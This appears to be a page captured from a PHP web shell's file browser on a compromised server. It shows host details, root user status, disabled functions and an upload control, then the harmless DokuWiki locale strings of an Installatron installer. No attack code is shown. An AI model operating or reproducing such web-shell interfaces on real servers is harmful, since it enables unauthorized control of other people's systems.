KUK
Server: Apache
System: Linux 247.44.167.72.host.secureserver.net 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
User: root (0)
PHP: 8.0.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //var/installatron/installers/dokuwiki/locale_en.php
<?php

itron::$locale = array_merge(itron::$locale,array(
	"_installer_dokuwiki_title" => "DokuWiki",
	"_installer_dokuwiki_type" => "_types_wiki",
	"_installer_dokuwiki_category" => "_categories_communitysoftware",
	"_installer_dokuwiki_description" => "DokuWiki is a lightweight, open source wiki application.",
	"_installer_dokuwiki_authordescription" => "DokuWiki is a standards compliant, simple to use wiki, mainly aimed at creating documentation of any kind. It is targeted at developer teams, workgroups and small companies. It has a simple but powerful syntax which makes sure the datafiles remain readable outside the Wiki and eases the creation of structured texts. All data is stored in plain text files &ndash; no database is required.",
));

?>